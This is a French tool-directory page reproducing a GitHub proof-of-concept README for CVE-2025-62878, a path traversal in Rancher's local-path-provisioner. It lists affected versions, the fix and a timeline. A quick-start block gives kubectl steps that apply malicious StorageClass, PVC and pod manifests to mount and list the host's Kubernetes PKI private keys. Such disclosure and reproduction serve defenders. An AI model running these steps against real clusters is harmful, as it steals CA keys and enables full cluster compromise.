Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-62878 — CVE-2025-62878 | Kitploit
Outils/GitHubGitHub/kinokopio/cve-2025-62878
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationSécurité CloudMauvaise ConfigurationApprentissage et ÉducationLabs et Pratique
GitHubkinokopio/cve-2025-62878

CVE-2025-62878

CVE-2025-62878

Voir le dépôt
13il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2025-62878: Traversée de chemin dans Local Path Provisioner

Vue d'ensemble

ÉlémentValeur
CVE IDCVE-2025-62878
GHSA IDGHSA-jr3w-9vfr-c746
GravitéCritique (CVSS 10.0)
CWECWE-23 (Traversée de chemin relative)
Composant affectérancher/local-path-provisioner
Versions affectéesv0.0.27 ~ v0.0.32
Versions corrigéesv0.0.33+

Description de la vulnérabilité

Une vulnérabilité de traversée de chemin existe dans le paramètre pathPattern de StorageClass. Un utilisateur malveillant peut manipuler pathPattern en utilisant des éléments de chemin relatifs (par exemple ../) pour créer des PersistentVolumes pointant vers des emplacements arbitraires sur le nœud hôte, contournant la restriction de répertoire de base configurée.

Cela permet aux attaquants de :

  • Accéder à des fichiers sensibles de l'hôte (par exemple /etc/kubernetes/pki/)
  • Écraser des fichiers système critiques
  • Compromettre entièrement le cluster en volant les clés privées de l'autorité de certification Kubernetes

Versions affectées (Vérifiées)

Remarque : L'avis officiel GitHub indique que les versions "< 0.0.34" sont affectées, mais nos tests confirment :

  • v0.0.33 est déjà corrigée
  • v0.0.26 et antérieures ne sont pas affectées (la fonctionnalité pathPattern n'existe pas)
  • Plage affectée réelle : v0.0.27 <= version <= v0.0.32

Chronologie

ÉvénementDate
Fonctionnalité pathPattern introduite2024-05-26 (commit af85381)
Première version vulnérable (v0.0.27)

Reproduction

Voir le répertoire exploit/ pour les étapes de reproduction détaillées et les scripts.

Démarrage rapide

root@kitploit:~
# 1. Install vulnerable version
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml

# 2. Apply exploit
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml

# 3. Verify exploitation
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# Output: /etc/kubernetes/pki

kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Shows Kubernetes PKI certificates and private keys

Correction

Mettez à niveau vers v0.0.33 ou ultérieure :

root@kitploit:~
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml

Références

  • Avis GitHub GHSA-jr3w-9vfr-c746
  • Commit de correction 1ed6b54
  • Fonctionnalité pathPattern Commit af85381
Télécharger l’outil
VersionDate de publicationSupport de pathPatternVulnérable
v0.0.262023-12-03NonSûr (fonctionnalité inexistante)
v0.0.272024-05-29OuiVulnérable
v0.0.282024-06-19OuiVulnérable
v0.0.292024-09-03OuiVulnérable
v0.0.302024-10-07OuiVulnérable
v0.0.312025-01-24OuiVulnérable
v0.0.322025-07-31OuiVulnérable
v0.0.332025-12-25OuiCorrigé
v0.0.342026-01-06OuiCorrigé
2024-05-29
Commit de correction2025-12-24 (commit 1ed6b54)
Première version corrigée (v0.0.33)2025-12-25
CVE publiée2026-02-04